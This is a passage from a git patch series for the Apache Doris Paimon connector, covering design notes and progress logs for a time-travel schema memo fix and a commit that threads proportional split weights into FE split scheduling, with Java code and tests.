micro-test** (kept sysName in the key). +- **NIT (PARTIAL):** 4-arg ctor visibility unspecified → **pinned package-private**. + +Refuted/optional (no change): negative-caching of loader failures (pseudocode already correct); +`assertSame`-on-hit (the `ops.log` no-schemaAt assertion is the real discriminator, and `assertSame` would +wrongly couple to instance-memoization — incompatible with the `PaimonSchemaSnapshot` rebuild); Test-4 +memo-not-touched extension (already optional/covered); import-rule safe (confirmed). diff --git a/plan-doc/designs/FIX-B-MC2-SCHEMA-AT-MEMO-summary.md b/plan-doc/designs/FIX-B-MC2-SCHEMA-AT-MEMO-summary.md new file mode 100644 index 00000000000000..d21bef921276cb --- /dev/null +++ b/plan-doc/designs/FIX-B-MC2-SCHEMA-AT-MEMO-summary.md @@ -0,0 +1,74 @@ +# FIX-B-MC2 — time-travel schema-at-snapshot second-level memo — SUMMARY + +> Deviation 3/5 of the P6 deviation→fix batch. Single-task loop: design → design red-team (`wf_903bf4e9-3a4`) +> → implement → impl-verify (`wf_67804f35-d5e`) → build+UT (RED→GREEN) → commit. Design + adjudication detail +> in `FIX-B-MC2-SCHEMA-AT-MEMO-design.md`. + +## Problem + +Time-travel reads (`FOR VERSION/TIME AS OF`, `@tag`, `@branch`) resolved the schema AS OF the pinned +schemaId by calling `catalogOps.schemaAt(table, schemaId)` (a paimon `schemaManager().schema(id)` +schema-file read) on **every query**, pinning the result only to the per-statement +`PluginDrivenMvccSnapshot`. Repeated time-travel to the same snapshot re-read the schema file. Legacy +served it from the shared catalog-level `PaimonExternalMetaCache` keyed by `(NameMapping, schemaId)` (repeat += hit); the SPI cutover (CACHE-P1) dropped that second-level cache. NIT / perf-only; the user elected to fix. + +## Root cause + +`PaimonConnector.getMetadata()` returns a **fresh** `PaimonConnectorMetadata` per query, so nothing on the +metadata persists the at-snapshot schema across queries. The legacy cache lived on the long-lived +catalog-level metacache; the cutover had no equivalent on the time-travel path. + +## Fix + +A connector-side, immutable, bounded second-level memo of the `schemaAt` read: + +- **New `PaimonSchemaAtMemo`** (package-private): a plain `ConcurrentHashMap` + (module convention; lock-free reads) with a best-effort size bound (clear-on-overflow). `getOrLoad` does + `get → (miss) loader.get() OUTSIDE any lock → putIfAbsent`; a concurrent same-key double-load is harmless + (immutable identical value) and equals the pre-fix per-query load; a loader exception is never cached. +- **`MemoKey`** = the handle's extracted identity `(databaseName, tableName, sysTableName, branchName, + schemaId)`, mirroring `PaimonTableHandle.equals/hashCode`. Stored as extracted fields (NOT a retained + handle) so the memo does not pin the handle's loaded paimon `Table` in memory. +- **`PaimonConnector`** owns the memo (one per catalog, long-lived; rebuilt → empty on REFRESH CATALOG via + `onClose` `connector=null`) and injects it into each per-query metadata via a new **package-private** + 4-arg ctor. The public 3-arg ctor delegates with a fresh per-instance memo, so the ~15 existing + construction sites are unchanged. +- **`PaimonConnectorMetadata.getTableSchema(session, handle, snapshot)`** — the only changed path, and only + its `schemaId >= 0` branch (the `< 0` latest fallback is untouched): `resolveTable` runs **once** (outside + the loader, so a branch handle's `getTable` reload stays at most one per query = pre-fix), then + `schemaAtMemo.getOrLoad(handle, schemaId, () -> catalogOps.schemaAt(table, schemaId))`, then + `buildTableSchema` rebuilds the `ConnectorTableSchema` fresh from the live table. + +**Key red-team correction (MAJOR):** the original design memoized the built `ConnectorTableSchema`, which +embeds the **live** `coreOptions()` — not keyed by schemaId → could serve stale PROPERTIES after an +external `ALTER…SET` without REFRESH. Switched to memoizing the raw `PaimonSchemaSnapshot` (a pure function +of `(table-identity, schemaId)` — the actual `schemaAt` I/O target); `ConnectorTableSchema` is rebuilt per +query so `coreOptions`/`properties` stay live. The single behavioral delta vs pre-fix is therefore "the +`schemaAt` read is skipped on a repeat"; everything else is byte-identical. + +## No-regression (the hard constraint — red-team-verified) + +1. The cached value is a pure function of the key → no stale read, no TTL; the only invalidation is REFRESH + (connector rebuild → fresh memo). Live coreOptions are NOT cached. +2. The latest path (schemaId<0) never builds a key; the 2-arg latest schema stays cached by the bridge. +3. Worst case = pre-fix: miss = pre-fix load + O(1) put; hit = pre-fix minus the `schemaAt` read; overflow/ + concurrent-double-load = a re-read. The memo never does more work than before on any path. + +## Tests (RED→GREEN verified by separate mutation runs) + +- `PaimonConnectorMetadataMvccTest` (+3): `getTableSchemaAtSnapshotIsMemoizedAcrossQueries` (two metadata + sharing one memo → second query reads NO `schemaAt`), `...MemoIsKeyedBySchemaId`, `...MemoIsKeyedByBranch` + (asserts the branch actually read AND its columns differ from base). +- `PaimonSchemaAtMemoTest` (new, 3): `sameKeyLoadsOnce`, `sysTableNameDistinguishesKey` (Rule-9 guard for the + sysName key component), `overflowEvictsAndReReadsNeverStale` (bound degrades to a re-read, never stale). +- **RED proof:** RED-1 (memo disabled) → both memo tests fail; RED-2 (key drops schemaId/branch/sys) → all + 3 key tests fail; RED-3 (bound disabled) → overflow test fails. Each control test stayed green. + +## Result + +Full paimon module: **293 tests, 0 failures, 0 errors, 1 skipped** (gated live test); checkstyle clean; +`tools/check-connector-imports.sh` exit 0; BUILD SUCCESS. No fe-core / SPI / BE change. **e2e gated +(`enablePaimonTest=false`) — NOT run.** + +HEAD after commit: see git log. Next deviation: **A1** (plugin split proportional weight), then **B-R2-be**. From 021309954e733932fe1ad0ccc6722fe1953c6311 Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 19 Jun 2026 15:16:56 +0800 Subject: [PATCH 116/128] =?UTF-8?q?docs(catalog-spi):=20P6=20B-MC2=20(sche?= =?UTF-8?q?ma-at-snapshot=20memo)=20fix=20done=20=E2=86=92=20HANDOFF=20nex?= =?UTF-8?q?t=20=3D=20A1?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/HANDOFF.md | 39 +++++++++++++++++------- plan-doc/task-list-P6-deviation-fixes.md | 18 +++++++++-- 2 files changed, 44 insertions(+), 13 deletions(-) diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 6277bed5478436..d5770e4bcd8020 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -6,7 +6,7 @@ --- -# 🎯 下一个 session 的任务 — **B-MC2(time-travel schema 二级缓存 memo,⚠️ NO PERF REGRESSION)→ 见 `task-list-P6-deviation-fixes.md`**(5 个 deviation→fix:**A3 ✅ `5fa47c27eb8` / A2 ✅ `1935748d6c3` 已完成**,剩 B-MC2 / A1 / B-R2-be,逐一修) +# 🎯 下一个 session 的任务 — **A1(插件 split 比例权重,⚠️ FE 调度回归)→ 见 `task-list-P6-deviation-fixes.md`**(5 个 deviation→fix:**A3 ✅ `5fa47c27eb8` / A2 ✅ `1935748d6c3` / B-MC2 ✅ `10284edbf88` 已完成**,剩 A1 / B-R2-be,逐一修;建议序 A1→B-R2-be) > **进度(2026-06-19)**:P6 发现项按 `task-list-P6-fixes.md` 的 prioritized list 逐个修(单任务循环: > design → 红队 → 实现 → impl 验证 → build+UT → commit)。 @@ -18,6 +18,20 @@ > **RED→GREEN 两次独立跑验证**:未修代码 weight-0 测失败 1,修后 3/0);283/0/0/1skip + checkstyle0 + import0;design 红队 > `wf_3f2cd605-2a8`(9 候选→0-actionable on code)、impl-verify **APPROVE**;e2e gated 未跑。详见 > `designs/FIX-A3-SELF-SPLIT-WEIGHT-{design,summary}.md`。 +> **✅ B-MC2 (NIT, CACHE-P1, deviation 3/5, ⚠️NO PERF REGRESSION) `10284edbf88`**:恢复 time-travel +> schema-at-snapshot 的跨查询二级缓存(SPI cutover CACHE-P1 丢弃)。新连接器侧 `PaimonSchemaAtMemo` +> (`ConcurrentHashMap`,loader 在锁外 + best-effort clear-on-overflow 界), +> 由**长寿命 per-catalog `PaimonConnector`** 持有(REFRESH→onClose connector=null→重建→空 memo)并经**新 +> package-private 4-arg ctor** 注入每查询的 metadata(public 3-arg 委托一个 fresh per-instance memo→~15 处构造点不变)。 +> `getTableSchema(snapshot)` schemaId>=0 臂:`resolveTable` 在 loader 外**只调一次**(branch handle 的 getTable 仍 1/查询), +> memo 只包 `schemaAt` 读,`ConnectorTableSchema` 每查询**重建**。**design 红队 MAJOR 已采纳**:缓存原始 +> `PaimonSchemaSnapshot`(key 的纯函数),**非**built `ConnectorTableSchema`(它嵌 live `coreOptions`→陈旧属性风险)。 +> `MemoKey`=抽取的 handle 身份(db,table,sysName,branch)+schemaId(不留 handle 引用→不钉住已加载的 paimon Table, +> 偏离红队「delegate to handle.equals」是为避免钉住 Table)。+3 `PaimonConnectorMetadataMvccTest` + 新 +> `PaimonSchemaAtMemoTest`(3),各由独立 mutation 跑 **RED→GREEN 验证**(RED-1 memo禁/RED-2 key丢字段/RED-3 界禁); +> 293/0/0/1skip + checkstyle0 + import0;design 红队 `wf_903bf4e9-3a4`、impl-verify `wf_67804f35-d5e` +> (2×COMMIT_AS_IS+1×FIX_THEN_COMMIT=仅 verifier 自留 scratch,产品码干净);e2e gated 未跑。详见 +> `designs/FIX-B-MC2-SCHEMA-AT-MEMO-{design,summary}.md`。 > **✅ A2 (MINOR, missing-port, deviation 2/5) `1935748d6c3`**:`appendExplainInfo` 反序列化已在 props 里的 > `paimon.predicate`(即推给 SDK 的 `List`)重发 legacy `predicatesFromPaimon:` 块,置于 > `paimonNativeReadSplits=` 与 VERBOSE `PaimonSplitStats` 之间(legacy 序 `PaimonScanNode:657-671`)。不重跑 converter @@ -50,15 +64,13 @@ > `PaimonMetadataOps:340` 完全一致(且所有其它连接器都 propagate),原先吞成 emptyList 且注释谎称 parity。280/0 paimon(+1 > gated skip)+16/0+3/0+14/0+12/0;fe-core 编译过;checkstyle 0;import-check 干净;design+impl 两道红队均 0-actionable;e2e gated。 > 详见 `designs/FIX-C4-R2-R3-CATALOG-{design,summary}.md`(design 红队 `wf_444e33b9-5c6`、impl 红队 `wf_b3d35e64-6b9`)。 -> **下一个 = B-MC2(A3 `5fa47c27eb8` / A2 `1935748d6c3` 已完成);剩 3 个 deviation→fix(用户决定修,非接受)**:逐一走单任务循环 -> (详单见 **`task-list-P6-deviation-fixes.md`**,剩余建议序 B-MC2→A1→B-R2-be):**A1** 插件 split 比例权重 +> **下一个 = A1(A3 `5fa47c27eb8` / A2 `1935748d6c3` / B-MC2 `10284edbf88` 已完成);剩 2 个 deviation→fix(用户决定修,非接受)**:逐一走单任务循环 +> (详单见 **`task-list-P6-deviation-fixes.md`**,剩余建议序 A1→B-R2-be):**A1** 插件 split 比例权重 > (SPI `ConnectorScanRange` 加 `getSelfSplitWeight/getTargetSplitSize` + `PluginDrivenSplit` ctor 回填,连接器已算好只是没传 FE -> FileSplit);**A2** 重发 EXPLAIN `predicatesFromPaimon:`(连接器 `appendExplainInfo` 重转 filter);**A3** 去 -> `paimon.self_split_weight` 的 `>0` 闸(weight=0 也发,profile parity);**B-R2-be** schema-evolution 字典收窄到 +> FileSplit;FE 调度回归,BE 读/路由/结果不变);**B-R2-be** schema-evolution 字典收窄到 > 规划 split 的文件 schema_id(= legacy,K≤N 无回退;守卫=覆盖每个 `:483` 发的 per-file schema_id 否则 BE 硬崩;注意 -> getScanNodeProperties vs planScan 次序——需把 id 集从 planScan 透传,勿在 props 里重枚举 split);**B-MC2** 连接器侧 -> (Identifier, schemaId)→schema **不可变 memo**(time-travel 专用,latest 路不碰,bridge 不动;不可变键无 TTL;最坏=当前→无回退)。 -> ⚠️ **两个 B 项硬约束 = 不得有性能回退**:design 必须复现此处的无回退论证、红队必须验证。**这 5 项做完,再回到 P6-DEVIATIONS +> getScanNodeProperties vs planScan 次序——需把 id 集从 planScan 透传,勿在 props 里重枚举 split)。 +> ⚠️ **B-R2-be 硬约束 = 不得有性能回退**:design 必须复现 task-list 的无回退论证、红队必须验证(B-MC2 同约束已照此完成)。**这 2 项做完,再回到 P6-DEVIATIONS > 余项**(剩余 MINOR/NIT + `PluginDrivenExternalCatalog:140` 吞异常 → `deviations-log.md` 签字)即清零 P6-fixes 批。 paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口线,2 波,零历史先验)**已完成**。 @@ -114,8 +126,13 @@ paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口 - ✅ **A2**(MINOR missing-port)— **DONE `1935748d6c3`**:`appendExplainInfo` 反序列化 `paimon.predicate` 重发 legacy `predicatesFromPaimon:`(置于 `paimonNativeReadSplits=` 与 VERBOSE `PaimonSplitStats` 间,legacy 序);不重跑 converter; 4 新 UT RED→GREEN;287/0/0/1skip。详见 `designs/FIX-A2-PREDICATES-FROM-PAIMON-{design,summary}.md`。 - - **剩 3 个 deviation→fix(下一个 = B-MC2,用户决定修)**:B-MC2 + A1 + B-R2-be,逐一走单任务循环。完整详单(机制/ - 修法/文件/**两个 B 项的无回退论证**/测试意图)见 **`task-list-P6-deviation-fixes.md`**。建议序 B-MC2→A1→B-R2-be。 + - ✅ **B-MC2**(NIT CACHE-P1,⚠️NO PERF REGRESSION)— **DONE `10284edbf88`**:连接器侧 `PaimonSchemaAtMemo` + (`ConcurrentHashMap`,loader 锁外 + clear-on-overflow 界)由 per-catalog `PaimonConnector` 持有并注入每查询 metadata; + `getTableSchema(snapshot)` schemaId>=0 臂 memo 只包 `schemaAt` 读、`ConnectorTableSchema` 每查询重建(红队 MAJOR:缓存 + 原始 `PaimonSchemaSnapshot` 非 built schema 以保 live coreOptions);+3 Mvcc UT + 新 `PaimonSchemaAtMemoTest`(3) 各 RED→GREEN; + 293/0/0/1skip。详见 `designs/FIX-B-MC2-SCHEMA-AT-MEMO-{design,summary}.md`(design 红队 `wf_903bf4e9-3a4`、impl-verify `wf_67804f35-d5e`)。 + - **剩 2 个 deviation→fix(下一个 = A1,用户决定修)**:A1 + B-R2-be,逐一走单任务循环。完整详单(机制/ + 修法/文件/**B-R2-be 的无回退论证**/测试意图)见 **`task-list-P6-deviation-fixes.md`**。建议序 A1→B-R2-be。 - **P6-DEVIATIONS 余项(5 项之后,本批最后一项)**:未转 fix 的剩余 MINOR/NIT 刻意偏离 + wave2 新增 + `PluginDrivenExternalCatalog:140` 吞 authenticator-wiring 异常(R3/R4/R5/R6 residual 属 B8 清理、2 BLOCKER 属 B8 护栏, 均不在此)。逐条记入新建 `deviations-log.md` accept-as-deviation(含用户签字)。 @@ -141,7 +158,7 @@ paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口 --- # 📦 仓库 / 进度状态 -- **HEAD = `1935748d6c3`**(FIX-A2 predicatesFromPaimon;前序 `5fa47c27eb8` A3、`82b6de0de98` C4/R2/R3、`f652b40d210` R1-table、`44499f073e8` R3-residual、`e95128aed5b` C2 HDFS XML、`9967846ef64` C1 MinIO)。当前分支 **`catalog-spi-07-paimon`**(非 master); +- **HEAD = `10284edbf88`**(FIX-B-MC2 schema-at-snapshot memo;前序 `1935748d6c3` A2、`5fa47c27eb8` A3、`82b6de0de98` C4/R2/R3、`f652b40d210` R1-table、`44499f073e8` R3-residual、`e95128aed5b` C2 HDFS XML、`9967846ef64` C1 MinIO)。当前分支 **`catalog-spi-07-paimon`**(非 master); remote `master-catalog-spi-07-paimon`(= PR [#64445](https://github.com/apache/doris/pull/64445) head)仍在 `82b6de0de98`, **本地领先:A3 起的 deviation fix commits 尚未 push** → 待本批 deviation fix 做完,session 收尾一次性 force-with-lease push + PR 评论 `run buildall`(见 §Commit 须知 / memory `catalog-spi-07-paimon-branch-pr-workflow`)。 diff --git a/plan-doc/task-list-P6-deviation-fixes.md b/plan-doc/task-list-P6-deviation-fixes.md index 13fe122937ea96..a4678420224e69 100644 --- a/plan-doc/task-list-P6-deviation-fixes.md +++ b/plan-doc/task-list-P6-deviation-fixes.md @@ -15,7 +15,7 @@ ## Suggested order (independent; smallest blast radius first) -A3 → A2 → B-MC2 → A1 → B-R2-be +A3 → A2 → B-MC2 → A1 → B-R2-be (✅ A3 / ✅ A2 / ✅ B-MC2 done; next = **A1**, then B-R2-be) --- @@ -88,7 +88,21 @@ A3 → A2 → B-MC2 → A1 → B-R2-be ## B-MC2 — time-travel schema re-resolved per query (no second-level cache) (NIT / CACHE-P1) — **NO PERF REGRESSION** -- [ ] **B-MC2** +- [x] **B-MC2** — DONE `10284edbf88`. New connector-side `PaimonSchemaAtMemo` + (`ConcurrentHashMap`, loader-outside-lock + best-effort clear-on-overflow + bound), owned by the long-lived per-catalog `PaimonConnector` (rebuilt→empty on REFRESH) and injected + into each per-query metadata via a new **package-private 4-arg ctor** (public 3-arg delegates with a fresh + per-instance memo → ~15 sites unchanged). `getTableSchema(snapshot)` schemaId>=0 branch: `resolveTable` + ONCE outside the loader, memo wraps ONLY the `schemaAt` read, `ConnectorTableSchema` rebuilt fresh per + query. **Design red-team MAJOR adopted:** memoize the raw `PaimonSchemaSnapshot` (pure function of the + key), NOT the built `ConnectorTableSchema` (which embeds live `coreOptions` → stale-properties risk). + `MemoKey` = extracted handle identity (db,table,sysName,branch)+schemaId (no `Table` pinning — a + deviation from the red-team's "delegate to handle.equals" to avoid retaining the loaded paimon Table). + +3 `PaimonConnectorMetadataMvccTest` + new `PaimonSchemaAtMemoTest` (3), each RED-verified by a separate + mutation run (RED-1 memo-disabled / RED-2 key-drops-fields / RED-3 bound-disabled). 293/0/0/1skip, + checkstyle 0, import-check 0; design red-team `wf_903bf4e9-3a4`, impl-verify `wf_67804f35-d5e` + (2× COMMIT_AS_IS + 1× FIX_THEN_COMMIT = only the verifier's own scratch file; production code clean). + e2e gated, NOT run. See `designs/FIX-B-MC2-SCHEMA-AT-MEMO-{design,summary}.md`. - **Finding:** report §MC2. `PluginDrivenMvccExternalTable.loadSnapshot:259-262` resolves schema-at-snapshot via `metadata.getTableSchema(pinnedHandle, snapshot)` (a `schemaAt` round-trip) **every query** and pins it to the per-statement `PluginDrivenMvccSnapshot` only. Repeated time-travel to the same snapshot re-reads it; legacy served From 9d687145a28b3140a3fa6ff356d0a301e1dd009c Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 19 Jun 2026 16:34:33 +0800 Subject: [PATCH 117/128] =?UTF-8?q?fix:=20FIX-A1=20=E2=80=94=20thread=20pr?= =?UTF-8?q?oportional=20split=20weight=20to=20the=20FE=20FileSplit=20(BE-a?= =?UTF-8?q?ssignment=20parity)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause: PluginDrivenSplit's ctor never set FileSplit.selfSplitWeight / targetSplitSize, so FileSplit.getSplitWeight() returned SplitWeight.standard() (uniform) for every plugin-driven split. Legacy paimon set both, so FederationBackendPolicy distributed splits across BEs by proportional (by-size) weight. FE BE-assignment only — no rows/route/BE-read/result change. The task-list's "already computed, just not threaded" held only for JNI/count splits. Two gaps: 1. The connector's NATIVE ranges (buildNativeRange) never set selfSplitWeight (Builder default 0). Legacy native sub-splits used selfSplitWeight = length (+ deletionFile.length()) (PaimonSplit:72,112). Native ORC/Parquet is the default read path, so weight 0 would clamp to 0.01 (uniform) and defeat the fix. 2. The weight denominator (legacy PaimonScanNode:499 = fileSplitSize>0 ? : max_file_split_size, 64MB default) is a DIFFERENT value from the connector's file-splitting targetSplitSize, carried nowhere. Fix: - SPI ConnectorScanRange: new default getters getSelfSplitWeight()/getTargetSplitSize(), sentinel -1 = "not provided". Connector-agnostic — all 6 non-paimon impls (jdbc/es/trino/maxcompute/hive/hudi) inherit -1 -> keep standard() (no regression). - PluginDrivenSplit ctor: set the FileSplit fields only when weight>=0 && target>0 (0 is a real weight; target>0 guards div-by-zero). Generic, no source-specific branching. - PaimonScanRange: new targetSplitSize field (default -1) + Builder + @Override getTargetSplitSize(); getSelfSplitWeight() marked @Override. - PaimonScanPlanProvider: resolveSplitWeightDenominator(session) (exact legacy formula), computed once and threaded as weightDenominator (named to avoid transposing with the file-split target) to every builder; buildNativeRange now sets selfSplitWeight = length + DV and targetSplitSize = weightDenominator; JNI/count add targetSplitSize. Applied to every split type incl. count pushdown. FE-only: the BE-thrift paimon.self_split_weight (A3) stays gated on paimonSplit != null, so native ranges still emit nothing to BE. Tests: fe-core PluginDrivenSplitWeightTest (W=50/T=100->50, clamp->1, 0-weight->1, -1 sentinel->standard, one-field-only->standard); fe-connector-api ConnectorScanRangeWeightDefaultsTest (-1 defaults); connector +5 PaimonScanPlanProviderTest (sentinel/round-trip, native weight=length+DV, positional-swap guard, count-pushdown denominator, denominator formula) + updated the 6 changed-signature call-sites. Each RED-verified by a separate mutation (ctor-gate-off / native-weight-drop / sentinel / denominator / swap). api 44/0, paimon 298/0/1skip, fe-core 5/0; checkstyle 0; import-check 0. e2e gated (enablePaimonTest=false) NOT run. Design + summary: plan-doc/designs/FIX-A1-SPLIT-WEIGHT-{design,summary}.md (design red-team wf_c8345c28-ee6, impl-verify wf_3381cfaa-205 both COMMIT_AS_IS). Co-Authored-By: Claude Opus 4.8 (1M context) --- .../api/scan/ConnectorScanRange.java | 25 +++ .../ConnectorScanRangeWeightDefaultsTest.java | 55 ++++++ .../paimon/PaimonScanPlanProvider.java | 49 ++++- .../connector/paimon/PaimonScanRange.java | 19 ++ .../paimon/PaimonScanPlanProviderTest.java | 118 +++++++++++- .../doris/datasource/PluginDrivenSplit.java | 11 ++ .../PluginDrivenSplitWeightTest.java | 117 ++++++++++++ .../designs/FIX-A1-SPLIT-WEIGHT-design.md | 175 ++++++++++++++++++ .../designs/FIX-A1-SPLIT-WEIGHT-summary.md | 63 +++++++ 9 files changed, 617 insertions(+), 15 deletions(-) create mode 100644 fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/scan/ConnectorScanRangeWeightDefaultsTest.java create mode 100644 fe/fe-core/src/test/java/org/apache/doris/datasource/PluginDrivenSplitWeightTest.java create mode 100644 plan-doc/designs/FIX-A1-SPLIT-WEIGHT-design.md create mode 100644 plan-doc/designs/FIX-A1-SPLIT-WEIGHT-summary.md diff --git a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/scan/ConnectorScanRange.java b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/scan/ConnectorScanRange.java index 7704b9e4ce081d..1d460784e6a555 100644 --- a/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/scan/ConnectorScanRange.java +++ b/fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/scan/ConnectorScanRange.java @@ -78,6 +78,31 @@ default long getModificationTime() { return 0; } + /** + * Returns this split's weight numerator for proportional BE assignment, or {@code -1} when the + * connector provides no weight. + * + *

    The engine forms a proportional split weight {@code getSelfSplitWeight() / getTargetSplitSize()} + * (clamped) only when BOTH this and {@link #getTargetSplitSize()} are provided; otherwise it falls back + * to {@code SplitWeight.standard()} (uniform). A connector with no size-based weight model keeps the + * {@code -1} default and is unaffected. {@code 0} is a legitimate weight (e.g. an empty file or a + * zero-row system-table split), distinct from the {@code -1} "not provided" sentinel.

    + */ + default long getSelfSplitWeight() { + return -1; + } + + /** + * Returns the weight denominator (scan-level target split size) used with {@link #getSelfSplitWeight()} + * to form the proportional split weight, or {@code -1} when not provided. + * + *

    Proportional weighting is applied only when this is positive AND {@link #getSelfSplitWeight()} is + * non-negative; otherwise the engine uses {@code SplitWeight.standard()}.

    + */ + default long getTargetSplitSize() { + return -1; + } + /** Returns preferred host locations for data locality. */ default List getHosts() { return Collections.emptyList(); diff --git a/fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/scan/ConnectorScanRangeWeightDefaultsTest.java b/fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/scan/ConnectorScanRangeWeightDefaultsTest.java new file mode 100644 index 00000000000000..05d625512ba0cc --- /dev/null +++ b/fe/fe-connector/fe-connector-api/src/test/java/org/apache/doris/connector/api/scan/ConnectorScanRangeWeightDefaultsTest.java @@ -0,0 +1,55 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.api.scan; + +import org.junit.jupiter.api.Assertions; +import org.junit.jupiter.api.Test; + +import java.util.Collections; +import java.util.Map; + +/** + * FIX-A1: a {@link ConnectorScanRange} that does not override the split-weight getters must inherit the + * {@code -1} "not provided" sentinel, so the engine ({@code PluginDrivenSplit}) leaves the FileSplit + * scheduling fields null and keeps {@code SplitWeight.standard()} (the no-regression guarantee for + * connectors with no size-based weight model: jdbc / es / trino / maxcompute). + */ +public class ConnectorScanRangeWeightDefaultsTest { + + @Test + public void defaultWeightGettersReturnSentinel() { + ConnectorScanRange range = new ConnectorScanRange() { + @Override + public ConnectorScanRangeType getRangeType() { + return ConnectorScanRangeType.FILE_SCAN; + } + + @Override + public Map getProperties() { + return Collections.emptyMap(); + } + }; + + // MUTATION: a 0 default would pass PluginDrivenSplit's weight>=0 gate and (with a target) flip + // these connectors to proportional weighting -> a behavior change for every non-weighting connector. + Assertions.assertEquals(-1L, range.getSelfSplitWeight(), + "getSelfSplitWeight() default must be the -1 sentinel, not 0"); + Assertions.assertEquals(-1L, range.getTargetSplitSize(), + "getTargetSplitSize() default must be the -1 sentinel, not 0"); + } +} diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java index 6d33ddf4ccb6a4..d265323432ebbe 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java @@ -377,10 +377,15 @@ private List planScanInternal( Map vendedToken = context != null ? extractVendedToken(table) : Collections.emptyMap(); + // FIX-A1: the FE FileSplit proportional-weight denominator (legacy PaimonScanNode:499, set on ALL + // splits). Session-only, so compute once here (before any split is built). DISTINCT from the + // file-splitting targetSplitSize below — named weightDenominator to make a positional swap impossible. + long weightDenominator = resolveSplitWeightDenominator(session); + // Non-DataSplit → always JNI for (Split split : nonDataSplits) { ranges.add(buildJniScanRange(split, tableLocation, defaultFileFormat, - Collections.emptyMap(), false, cppReader)); + Collections.emptyMap(), false, cppReader, weightDenominator)); } // COUNT(*) pushdown (FIX-COUNT-PUSHDOWN): collapse every split whose merged (post-merge / @@ -437,13 +442,13 @@ private List planScanInternal( (optDeletionFiles.isPresent() && i < optDeletionFiles.get().size()) ? optDeletionFiles.get().get(i) : null; ranges.addAll(buildNativeRanges(file, deletionFile, defaultFileFormat, - partitionValues, vendedToken, effectiveSplitSize)); + partitionValues, vendedToken, effectiveSplitSize, weightDenominator)); } } else { // JNI reader path ranges.add(buildJniScanRange( dataSplit, tableLocation, defaultFileFormat, - partitionValues, true, cppReader)); + partitionValues, true, cppReader, weightDenominator)); } } @@ -453,7 +458,7 @@ private List planScanInternal( Map partitionValues = getPartitionInfoMap( table, countRepresentative.partition(), session.getTimeZone()); ranges.add(buildCountRange(countRepresentative, tableLocation, defaultFileFormat, - partitionValues, cppReader, countSum)); + partitionValues, cppReader, countSum, weightDenominator)); } return ranges; @@ -471,8 +476,13 @@ private List planScanInternal( */ PaimonScanRange buildNativeRange(RawFile file, DeletionFile deletionFile, String defaultFileFormat, Map partitionValues, - Map vendedToken, long start, long length) { + Map vendedToken, long start, long length, long weightDenominator) { String fileFormat = getFileFormatBySuffix(file.path()).orElse(defaultFileFormat); + // FIX-A1: native sub-split FE weight = the sub-range byte length, + the deletion-vector length when + // attached (legacy PaimonSplit(LocationPath,...).selfSplitWeight = length, setDeletionFile += DV). + // This is FE-scheduling only; the BE-thrift paimon.self_split_weight stays gated on paimonSplit (A3) + // so native ranges still do not emit it to BE. + long selfSplitWeight = length + (deletionFile != null ? deletionFile.length() : 0); PaimonScanRange.Builder builder = new PaimonScanRange.Builder() .path(normalizeUri(file.path(), vendedToken)) .start(start) @@ -480,6 +490,8 @@ PaimonScanRange buildNativeRange(RawFile file, DeletionFile deletionFile, .fileSize(file.length()) .fileFormat(fileFormat) .partitionValues(partitionValues) + .selfSplitWeight(selfSplitWeight) + .targetSplitSize(weightDenominator) .schemaId(file.schemaId()); if (deletionFile != null) { builder.deletionFile( @@ -502,11 +514,11 @@ PaimonScanRange buildNativeRange(RawFile file, DeletionFile deletionFile, */ List buildNativeRanges(RawFile file, DeletionFile deletionFile, String defaultFileFormat, Map partitionValues, - Map vendedToken, long targetSplitSize) { + Map vendedToken, long targetSplitSize, long weightDenominator) { List result = new ArrayList<>(); for (long[] offset : computeFileSplitOffsets(file.length(), targetSplitSize)) { result.add(buildNativeRange(file, deletionFile, defaultFileFormat, - partitionValues, vendedToken, offset[0], offset[1])); + partitionValues, vendedToken, offset[0], offset[1], weightDenominator)); } return result; } @@ -724,7 +736,7 @@ static Map extractVendedToken(Table table) { private PaimonScanRange buildJniScanRange(Split split, String tableLocation, String defaultFileFormat, Map partitionValues, - boolean isDataSplit, boolean cppReader) { + boolean isDataSplit, boolean cppReader, long weightDenominator) { long splitWeight = 0; if (isDataSplit) { splitWeight = computeSplitWeight((DataSplit) split); @@ -745,6 +757,7 @@ private PaimonScanRange buildJniScanRange(Split split, String tableLocation, .tableLocation(tableLocation) .partitionValues(partitionValues) .selfSplitWeight(splitWeight) + .targetSplitSize(weightDenominator) .build(); } @@ -767,7 